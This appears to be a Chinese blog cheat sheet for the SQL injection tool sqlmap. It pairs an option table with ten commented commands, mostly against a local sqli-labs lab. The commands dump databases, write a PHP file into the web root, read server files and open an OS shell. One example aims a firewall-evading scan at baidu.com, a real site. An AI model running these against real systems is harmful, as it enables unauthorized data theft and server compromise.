命令及详解
| -h | 帮助 |
| --version | 版本号 |
| -d | 连接数据库"mysql://root:root@192.168.3.20:3306/db" "数据库种类://账号:密码@地址:端口/库 |
| --current-db | 当前数据库 |
| --dbs | 列出所有数据库 等于show database() |
| --tables | 列出某库的所有表 |
| --columns | 列出某表的所有列 |
| -D | 选择哪个数据库 |
| -T | 选择哪个表 |
| -C | 选择哪个列 |
| --dump | 获取字段里的数据 |
| --dump-al | 脱库 |
| --batch | 选项全选yes |
| --smart | 启发式快速判断 |
| --forms | post请求注入 ,http包头包体每个字段尝试注入, --level最好是2 |
| -r | 从文件中载入http请求,指定数据包 先抓一个包然后保存下来使用-r |
| -g | 从谷歌里按照谷歌语法搜索前100条有get请求的url去测试 |
| -o | 开启性能优化,优化的分别为--keep-alive,--null-connection,--thread |
| --tamper | 使用脚本,多脚本用逗号隔开 通常绕过waf |
| -v | 回显等级0~6 |
| --delay | 访问间隔,绕过waf |
| --os-shell | 获取webshell |
| -m | 读取文件中的url批量操作 |
| --data | post请求的包体可以直接写后面 |
| --timeout | 设置超时时间 |
| -level | 注入探索等级,一般用4 |
| --is-dba | 是否是dba权限 |
| --risk | 风险等级(0-3,默认为1) |
| --identify-waf | 检测防火墙类型 |
| --param-del | 设置参数分隔符 |
| --skip-urlencode | 跳过url编码 |
| --keep-alive | 这是持久连接,加快探测速度 |
| --null-connection | 检索没有body响应内容,多用于盲注 |
| --thread | 设置线程数,最大10 |
| --technique | 选择注入类型 B 布尔注入,E报错注入,U联合注入 T时间盲注 S 使用sqlmap的配置,如果是布尔盲注应选择U而并非B |
| --cookie "t=1" | cookie注入 |
| --safe-url | 每隔一段时间去访问安全页面 |
| --proxy | 代理 |
| --file-read | 读取服务器里的哪个文件,等同于手工注入的load_file() |
| --file-write | 选取本地的哪个文件 |
| --file-dest | 写入服务器里的哪个文件 ,等同于手工注入的into out_file()和--file-write 一起使用 |
| --dbms | 设置数据库类型 |
只要是单词或者是单词缩写的前面都是--,只要是单字母前面都是-
实例注解:
1、获取所有数据库
sqlmap -u "http://192.168.3.35/sqli-labs-master/Less-1/?id=1" -o --dbs --batch
--level=1 --threads=10 --dbms=MySql --technique="U"
#-u url
#-o 开启性能优化
#--dbs 爆破所有数据库
#--batch 操作默认选择为y
#--level=1 注入探索等级为1
#--threads=10 开启10个线程(最大10个)
#--dbms=MySql 设置数据库为MySql
#--technique="U" 设置注入类型为联合注入2、获取test库中的表
sqlmap -u "http://192.168.3.35/sqli-labs-master/Less-1/?id=1" -o -D test
--tables --batch --level=1 --threads=10 --dbms=MySql --technique="U"
#-u url
#-o 开启性能优化
#-D test 选择test库
#--tables 获取test库里的所有表
#--batch 操作默认选择为y
#--level=1 注入探索等级为1
#--threads=10 开启10个线程(最大10个)
#--dbms=MySql 设置数据库为MySql
#--technique="U" 设置注入类型为联合注入
3、获取make表中的字段
sqlmap -u "http://192.168.3.35/sqli-labs-master/Less-1/?id=1" -o -D test -T make
--columns --batch --level=1 --threads=10 --dbms=MySql --technique="U"
#-u url
#-o 开启性能优化
#-D test 选择test库
#-T make 选择make表
#--columns 获取make表里的所有字段
#--batch 操作默认选择为y
#--level=1 注入探索等级为1
#--threads=10 开启10个线程(最大10个)
#--dbms=MySql 设置数据库为MySql
#--technique="U" 设置注入类型为联合注入4、获取数据
sqlmap -u "http://192.168.3.35/sqli-labs-master/Less-1/?id=1" -o -D longmao -T make
--dump --batch --level=1 --threads=10 --dbms=MySql --technique="U"
#-u url
#-o 开启性能优化
#-D test 选择test库
#-T make 选择make表
#--dump 获取make表里的所有数据
#--batch 操作默认选择为y
#--level=1 注入探索等级为1
#--threads=10 开启10个线程(最大10个)
#--dbms=MySql 设置数据库为MySql
#--technique="U" 设置注入类型为联合注入5、写入文件到服务器
sqlmap -u "http://192.168.3.35/sqli-labs-master/Less-1/?id=1" --batch --dbms=MySql
--file-write="1.php" --file-dest="D:/phpStudy/PHPTutorial/WWW/1.php"
#-u url
#--batch 操作默认选择为y
#--dbms=MySql 设置数据库为MySql
#--file-write="1.php" 选择本地文件1.php
#--file-dest="D:/phpStudy/PHPTutorial/WWW/1.php" 把本地1.php文件写入到服务器根目录里1.php文件
6、从服务器读入文件
sqlmap -u http://192.168.3.35/sqli-labs-master/Less-1/?id=1 --batch --dbms=MySql
--file-read="D:/phpStudy/PHPTutorial/WWW/1.php"
#-u url
#--batch 操作默认选择为y
#--dbms=MySql 设置数据库为MySql
#--file-read="1.php" 下载服务器根目录下的1.php文件7、UA头注入
sqlmap -r "tt" -o --dbs --batch --level=3 --threads=10 --dbms=MySql --technique="E"
#-r tt 从tt文件中载入http请求,tt文件中需要把UA头后面加上*号
#-o 开启性能优化
#--dbs 爆破所有数据库
#--batch 操作默认选择为y
#--level=3 注入探索等级为3
#--threads=10 开启10个线程(最大10个)
#--dbms=MySql 设置数据库为MySql
#--technique="E" 设置注入类型为报错注入8、获取webshell
sqlmap -u "http://192.168.3.35/sqli-labs-master/Less-1/?id=1" --os-shell
#-u url
#--os-shell 获取webshell9、设置代理
sqlmap -u "https://www.baidu.com" -o --dbs --batch --proxy socks5://192.168.3.35:10888
--level=4 --tamper=space2comment --threads=10 --dbms=MySql
#-u url
#-o 开启性能优化
#--dbs 爆破所有数据库
#--batch 操作默认选择为y
#--proxy socks5://192.168.3.35:10888 设置代理
#--level=4 注入探索等级为4
#--tamper=space2comment 使用脚本绕过waf
#--threads=10 开启10个线程(最大10个)
#--dbms=MySql 设置数据库为MySql
10、Post布尔延迟注入
sqlmap -u "http://192.168.3.35/sqli-labs-master/Less-18/" -o --dbs --batch
--level=3 --threads=10 --dbms=MySql --forms --technique="UT"
#-u url
#-o 开启性能优化
#--dbs 爆破所有数据库
#--batch 操作默认选择为y
#--level=3 注入探索等级为3
#--threads=10 开启10个线程(最大10个)
#--dbms=MySql 设置数据库为MySql
#--forms Post注入
#--technique="UT" 设置注入方式为U为布尔注入和T为延迟注入
扫一扫
1802
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
